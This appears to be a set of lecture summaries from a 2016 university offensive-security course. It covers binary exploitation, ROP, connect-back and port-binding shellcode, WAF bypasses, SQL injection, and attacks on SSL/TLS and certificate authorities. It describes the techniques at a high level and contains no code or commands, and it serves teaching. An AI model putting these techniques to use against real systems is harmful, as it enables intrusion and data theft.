In this lecture, our guest Dr. Devin Cook, offers a overview of the brief history of modern binary exploitation. He covers everything from early buffer overflows and early stack overflow mitigations to modern mitigations, modern bypass techniques, and Return Oriented Programming (ROP).
September 30, 2016
September 26, 2016
This lecture's first half covers new material involving professional tips for Return Oriented Programming (ROP) Gadget hunting, the analysis and design of advanced shellcode, as well as a walkthrough of a dynamic shellcode linker engine. The second half of this lecture is a guest lecturer, Dr. Devin Cook demonstrating use of a ROP gadget finder, compiler, and chain tool he uses as part of Samuri's Capture The Flag (CTF) team.
Midterm #2 covers lectures 09-20
Return Oriented Programming (ROP) is introduced and a modern history of exploit mitigations is revisted. Other *-oriented programming exploitation techniques are discussed at a high level like Jump Oriented Programming (JOP) and Call Oriented Programming (COP). We walk through how to chain functions together with the stack under various function calling conventions (cdecl, fastcall, stdcall), and introduce the concept of gadgets. ROP Gadget compilers are introduced briefly. Finally the second half of the lecture presents a review of topics for MIDTERM 2.
September 19, 2016
The first half of the lecture covers Web Application Firewalls (WAFs), and how they are often trivially bypassed. The second half of the lecture covers and presents a walkthrough of alphnumeric, polymorphic, connect-back shellcode payload development techniques that are often used against WAFs, IDS, IPS, and other defenses. Connect back shellcode development is discussed for linux systems.
September 8, 2016
We cover the fragile ecosystems of the public key infrastructure system that support Secure Socket Layer (SSL) and Transport Layer Security (TLS): the internet certificate authorities. We cover the disturbing history of modern Certificate Authority (CA) failures and frequent compromises, and how rarely there is ever any consequence or improvement. Various attacks against SSL/TLS systems and certificate authorities are covered.
This time server-side attacks are covered in depth, and the OWASP top 10 is covered. We cover broken authentication and/or session management, the category of security mis-configuration, insecure direct object referencing, targeting admins and user functions with cross-site-request-forgery (CSRF), and similar functionality-level access control vulnerabilities, directory traversal, and finally SQL injection (SQLi). Metacharacter injection is again revisited as is encompasses almost all of these techniques in practice, and presents a straightforward model for approaching the diverse attack surface of web applications. SQLi is covered in depth, with several walkthroughs and techniques (inband error based, inband union based, 2nd order inband injection, partial blind, full blind, and more). We discuss SQLi discovery, fingerprinting, filter or restriction enumeration, table mapping, and finally data extraction. Defenses are covered such as prepared statements and encoding. Several SQLi defense bypasses are discussed.
September 2, 2016
We cover the internals of most modern web browsers and web server architectures to present deep overview of the massive attack surface associated with web applications and web browsing. The big picture is revisited and we discuss how modern binary exploitation techniques still heavily apply to each attack vector. Then we examine the growing security problem of indirect/background queries and the sharp rise of malicious 3rd party content and advertisements.
This lecture covers Secure Shell (SSH), Secure Socket Layer (SSL), IPsec, Port Scanning, and port-binding networking shellcode. We inspect the design and development of polymorphic port binding shellcode for Linux systems.
This lecture covers an overview of networking concepts and network security concepts. Topics covered include wireshark, nmap, nc, hubs vs switches vs routers, manufacturer default logins / backdoors, ARP & DNS (DNSSEC), proxies, and the weak IP vs strong IP model (RFC 1122).